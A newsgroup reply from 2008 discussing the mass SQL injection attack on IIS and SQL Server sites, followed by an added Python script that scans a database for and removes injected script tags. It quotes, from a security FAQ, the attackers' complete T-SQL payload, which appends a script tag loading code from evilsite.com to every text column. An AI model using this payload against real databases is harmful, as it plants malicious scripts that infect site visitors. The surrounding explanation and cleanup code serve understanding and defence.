  Re: I promised not to mock ...  
From: Gail Shaw
Date: 28 Apr 2008 16:10:08
Message: <48162f20@news.povray.org>
"Doctor John" <doc### [at] gmailcom> wrote in message
news:481623fb@news.povray.org...
> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>

From what I read, that's not the fault of any MS product, but of bad
developers not checking their DB input. SQL injection is just as possible on
a unix powered site with apache and oracle as it is with IIS and SQL server
(or IIS with MySQL, or IIS with Oracle, or apache windows with SQL server
...)

http://hackademix.net/2008/04/26/mass-attack-faq/

The attack is targeting Microsoft IIS web servers. Is it exploiting a
Microsoft vulnerability?
Yes and no. Web developers (or their employers who did not mandate proper
security education) are to blame for each single infection, because the SQL
injection exploited to infect the web sites is possible thanks to trivial
coding errors.
That said, the attackers are targeting IIS web servers which run ASP for a
reason.
Crackers put together a clever SQL procedure capable of polluting any
Microsoft SQL Server database in a generic way, with no need of knowing the
specific table and fields layouts:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

This is the "secret sauce" which is allowing the attack to reach its
impressive numbers, and it works exclusively against Microsoft database
technology - but it's a feature, not a bug (no irony intended this time).
Anyway, the chances for such "powerful" DB technology of being used in
conjunction with web servers different than IIS are very low.
So, to recap:

  1. There's no Microsoft-specific vulnerability involved: SQL injections
can happen (and do happen) on LAMP and other web application stacks as
well.
  2. SQL injections, and therefore these infections, are caused by poor
coding practices during web site development.
  3. Nonetheless, this mass automated epidemic is due to specific features
of Microsoft databases, allowing the exploit code to be generic, rather than
tailored for each single web site. Update: more details in this comment.
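
The same catalog walk can be turned around for incident response: enumerate every text column and report or strip the appended tag. This is an added example, not part of the original post or the quoted FAQ. It assumes Python's sqlite3, with sqlite_master and PRAGMA table_info standing in for sysobjects and syscolumns; the function names are hypothetical and the sample database is constructed.

```python
import re
import sqlite3

# Shape of the tag the quoted payload appends to every text column.
INJECTED = re.compile(r"<script\s+src=[^>]*>\s*</script>", re.IGNORECASE)

def text_columns(conn):
    """Yield (table, column) for each text-typed column of each user table."""
    tables = conn.execute("SELECT name FROM sqlite_master "
                          "WHERE type='table' AND name NOT LIKE 'sqlite_%'").fetchall()
    for (table,) in tables:
        for row in conn.execute(f'PRAGMA table_info("{table}")').fetchall():
            if any(t in row[2].upper() for t in ("CHAR", "TEXT", "CLOB")):
                yield table, row[1]          # row = (cid, name, type, ...)

def tainted_rows(conn, table, col):
    """Return [(rowid, value)] for rows whose column holds an injected tag."""
    # Identifiers come from the catalog, not from users; the LIKE value is bound.
    rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}" '
                        f'WHERE "{col}" LIKE ?', ("%<script%",)).fetchall()
    return [(rid, v) for rid, v in rows if isinstance(v, str) and INJECTED.search(v)]

def scan(conn):
    """Return {(table, column): tainted row count}, omitting clean columns."""
    hits = {(t, c): len(tainted_rows(conn, t, c)) for t, c in text_columns(conn)}
    return {key: n for key, n in hits.items() if n}

def clean(conn):
    """Strip injected tags in place; return the number of values rewritten."""
    changed = 0
    for table, col in scan(conn):
        for rid, value in tainted_rows(conn, table, col):
            conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                         (INJECTED.sub("", value), rid))
            changed += 1
    return changed

def demo_db():
    """Constructed sample: two tables, three values carrying the appended tag."""
    tag = "<script src=http://evilsite.com/1.js></script>"  # URL as quoted above
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name VARCHAR(50), descr TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, login NVARCHAR(30))")
    conn.executemany("INSERT INTO products VALUES (?,?,?)",
                     [(1, "Widget" + tag, "Blue" + tag), (2, "Gadget", "Red" + tag)])
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    return conn
```

Run scan() on a restored copy first and compare the counts against a known-good backup before letting clean() rewrite anything.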

